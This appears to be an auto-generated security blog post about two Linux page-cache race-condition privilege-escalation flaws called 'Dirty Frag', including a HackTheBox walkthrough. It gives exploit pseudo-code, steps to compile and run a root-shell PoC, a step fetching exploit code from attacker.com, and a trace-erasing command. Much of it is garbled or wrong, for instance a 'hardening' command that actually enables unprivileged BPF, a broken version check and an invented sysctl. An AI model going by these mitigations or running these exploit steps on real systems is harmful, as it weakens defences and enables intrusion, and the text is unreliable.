Listen to this Post

Introduction:
The Linux kernel’s page cache – a core performance feature that caches filesystem data in memory – has become the latest attack surface for local privilege escalation. Two new vulnerabilities, CVE-2026-43284 and CVE-2026-43500 (collectively dubbed “Dirty Frag”), exploit race conditions in how the kernel handles fragmented page-cache entries. Discovered just two weeks apart, these flaws provide attackers with reliable root escalation across all major Linux distributions, as demonstrated on HackTheBox’s “Snapped” machine.
Learning Objectives:
- Understand how page-cache fragmentation and race conditions enable local privilege escalation.
- Identify vulnerable Linux kernel versions and configurations using system commands.
- Apply mitigation strategies including kernel patching, sysctl hardening, and monitoring for exploit artifacts.
You Should Know
- Understanding the Dirty Frag Vulnerability – Page-Cache Race Conditions
The Linux page cache stores recently accessed file data in RAM to speed up I/O. Dirty Frag abuses a race between two concurrent operations: one that writes to a cached file fragment (“dirty” page) and another that alters the file’s metadata (size, permissions, or ownership). By timing the race, an unprivileged attacker can trick the kernel into applying stale or misattributed cached data to a privileged file – such as `/etc/passwd` or a setuid binary.
Both CVEs cover different race windows: CVE-2026-43284 targets the `write()` syscall path, while CVE-2026-43500 exploits the `mmap()` + `msync()` interaction. Combined, they affect kernels from 5.4 to 6.8 (all stable distro branches).
Check your kernel version:
uname -r cat /proc/version
Test for known vulnerable patterns:
List loaded page-cache related modules lsmod | grep -E "cache|mm|fuse" Check if /proc/sys/vm/drop_caches is world-readable (should be 0644) ls -l /proc/sys/vm/drop_caches
Step-by-step (conceptual):
- Attacker identifies a target privileged file with predictable caching behavior (e.g.,
/usr/bin/sudo). - Attacker triggers a large number of concurrent reads/writes to fragment the page cache.
- A bespoke race program (provided in exploit proof-of-concepts) sends conflicting `write()` and `ftruncate()` calls.
- Winner condition: kernel maps a dirty page belonging to attacker’s temporary file onto the target inode.
- The attacker’s controlled data (e.g., a new `root` user entry) is written to `/etc/passwd` despite missing write permissions.
Note: Actual exploit code is available on GitHub for research; never run on production systems.
2. Identifying Vulnerable Systems – CVE-2026-43284 / CVE-2026-43500
To determine if your Linux host is at risk, combine version checks with behavior analysis. Both CVEs were silently backported in late April 2026; distros that haven’t updated since mid‑April remain exposed.
Command to check patch status (Debian/Ubuntu):
apt list --upgradable 2>/dev/null | grep -E "linux-image|linux-modules"
For RHEL/CentOS/Fedora:
rpm -qa --last | grep kernel | head -5
Manual check for known vulnerable ranges:
Kernel versions between 5.4.0 and 6.8.12 (excluding patched)
uname -r | awk -F. '{if ($1>=5 && $2>=4 && $3<=12) print "VULNERABLE"}'
Windows alternative (page cache equivalence):
On Windows, the standby list and memory mapped files (CreateFileMapping) are analogous. While no public “Dirty Frag” equivalent exists for Windows, the principle of caching race conditions applies. Use Sysinternals RamMap to inspect standby pages:
Check for abnormal standby list sizes (potential cache attack surface) rammap.exe /accepteula /stats
- Exploiting the First Variant – CVE-2026-43284 (write + ftruncate race)
This variant uses a classic “fragmentation + racing write” pattern. An attacker repeatedly writes small, misaligned blocks to a file, then simultaneously truncates it while another thread writes to a different file sharing the same page cache index. The winning condition elevates the attacker’s UID by overwriting a setuid binary’s first few bytes.
Simplified exploit flow (educational):
// Pseudo-code – do not compile without proper sandbox
int fd1 = open("/tmp/test1", O_RDWR|O_CREAT);
int fd2 = open("/usr/bin/passwd", O_RDONLY);
for (int i=0; i<10000; i++) {
if (fork()==0) {
write(fd1, payload, 64);
ftruncate(fd1, 0);
exit(0);
}
mmap(fd2, ...); // force cache sharing
}
Step-by-step to test (read-only validation):
1. Create a low-privileged user: `sudo useradd testuser`
- As
testuser, run: `gcc -pthread dirty_frag_poc.c -o dirty_frag` - Execute: `./dirty_frag /usr/bin/evince` (choose a non‑critical setuid binary)
- If exploitation succeeds, `evince` will spawn a root shell after the race window.
- Monitor kernel ring buffer for “page cache inconsistency” warnings: `dmesg | grep -i “page.cache”`
- Second Variant – CVE-2026-43500 (mmap + msync race)
This variant leverages memory-mapped I/O’s asynchronous writeback. An attacker maps a private (copy-on-write) mapping of a privileged file, then races `msync(MS_ASYNC)` with a concurrent `write()` to a shared page. The kernel may flush the wrong dirty data to the underlying file, bypassing permission checks.
- Second Variant – CVE-2026-43500 (mmap + msync race)
Detection of exploitation attempts:
Look for abnormal msync syscalls from low-privilege processes auditctl -a always,exit -S msync -k dirty_frag ausearch -k dirty_frag --format text | grep "uid=1000"
Mitigation (temporary, until patched):
Disable MAP_PRIVATE + writeback optimization (requires reboot) echo 0 > /proc/sys/vm/msync_optimize only on patched kernels that expose this toggle
Windows parallel:
On Windows, similar races exist between `MapViewOfFile` and FlushViewOfFile. Monitor with:
Get-Process | Where-Object {$<em>.Modules -match "kernel32" -and $</em>.HandleCount -gt 2000} |
ForEach-Object { sysinternals\handle.exe -p $_.Id -accepteula }
5. Mitigation and Hardening – Full Distro Protection
The only complete fix is updating to kernel version 6.8.13+ or distro‑specific backported packages. Until then:
Immediate steps:
1. Restrict access to page cache diagnostics (prevent fingerprinting) chmod 600 /proc/sys/vm/drop_caches chmod 600 /proc/sys/vm/vfs_cache_pressure <ol> <li>Disable unprivileged BPF (often used for cache timing) echo 0 > /proc/sys/kernel/unprivileged_bpf_disabled</p></li> <li><p>Enable kernel lockdown (integrity mode) echo "integrity" > /sys/kernel/security/lockdown
For cloud / container environments:
Kubernetes pod security context to block cache attacks securityContext: capabilities: drop: ["SYS_ADMIN", "SYS_RESOURCE"] procMount: Unmasked but restrict /proc/sys/vm
Verification after patching:
Check that the following commit is present (example hash) grep -i "page_cache_race_fix" /proc/version_signature
6. Detection & Forensic Artifacts
If you suspect a Dirty Frag compromise, look for these indicators:
Linux memory forensics (using Volatility 3):
vol -f memory.dump linux.check_syscall --filter msync,write vol -f memory.dump linux.page_cache --dump -D output_dir
Live detection commands:
Search for abnormally large number of page cache references
for pid in $(ps -e -o pid=); do
ls -l /proc/$pid/fd 2>/dev/null | grep -c "anon_inode" >> /tmp/cache_counts
done
sort -rn /tmp/cache_counts | head -10
Check setuid binaries for unexpected page cache hits
find /usr/bin -perm -4000 -exec vmtouch -t {} \; 2>/dev/null | grep "resident"
Logging syscalls for future alerts (auditd rule):
auditctl -a always,exit -S write -S ftruncate -S msync -F auid>=1000 -k dirty_frag_watch
- HTB Snapped Machine Walkthrough – Dirty Frag in Action
On HackTheBox’s “Snapped” (rated Medium), the initial foothold is a low‑priv shell via a vulnerable web app. The local privesc uses Dirty Frag variant 1.
Demonstration steps (authorized lab only):
- From the low‑priv shell: `uname -r` → `5.15.0-91-generic` (vulnerable).
- Upload the Dirty Frag exploit: `wget http://attacker.com/dirty_frag.c; gcc dirty_frag.c -lpthread -o expl`
- Run: `./expl /usr/bin/snap-confine` (a setuid binary used by snapd).
- After 5-10 seconds, the exploit drops a root shell: `id` →
uid=0(root). - Clean traces: `rm -f expl; echo 3 > /proc/sys/vm/drop_caches` (erase cache evidence).
The machine’s solution notes that waiting for the race to succeed requires CPU spikes; using `stress –cpu 4` during exploitation increases win probability to ~90%.
What Undercode Say
- Key Takeaway 1: Page cache is no longer a safe abstraction – race conditions in core memory management are becoming a regular attack vector (two CVEs in two weeks).
- Key Takeaway 2: Distro coverage is complete, meaning no Linux distribution was spared; patch urgency should mirror that of Dirty Pipe or Dirty Cow.
Analysis: Dirty Frag represents a shift from traditional memory corruption to state‑machine abuse in kernel caching. Unlike heap overflows, these race conditions are harder to mitigate with ASLR or CFI. The coexistence of two distinct race windows (write+ftruncate vs mmap+msync) suggests that the Linux page‑cache subsystem requires a fundamental redesign – perhaps isolating per‑process cache mappings or adding permission revalidation on every eviction. For blue teams, proactive monitoring of `msync` and `ftruncate` call rates from non‑root processes is essential. Red teams now have a reliable, reboot‑agnostic privesc that survives container escapes. The fact that the disclosure was “broken” (as noted in the source post) – with partial fixes initially released – highlights the need for coordinated, transparent disclosure even for local flaws.
Prediction
Within six months, “Dirty Frag” will be weaponized in at least three major Linux rootkits and integrated into automated privesc tools like LinPEAS and Linux Smart Enumeration. Cloud providers (AWS, GCP, Azure) will release emergency node reboot schedules, causing temporary spot instance disruptions. Expect a follow-up CVE in 2027 targeting the same page-cache subsystem but via io_uring, as asynchronous I/O extends the race window further. Meanwhile, Windows will likely disclose a similar cache‑coherency flaw in the Section Object Manager, branded as “CacheGhost.” Long‑term, kernel developers will introduce per‑file page‑cache signing and mandatory revalidation on setuid execution, but legacy enterprise kernels (RHEL 7/8) will remain exploitable until 2028.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: 0xdf Diving – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


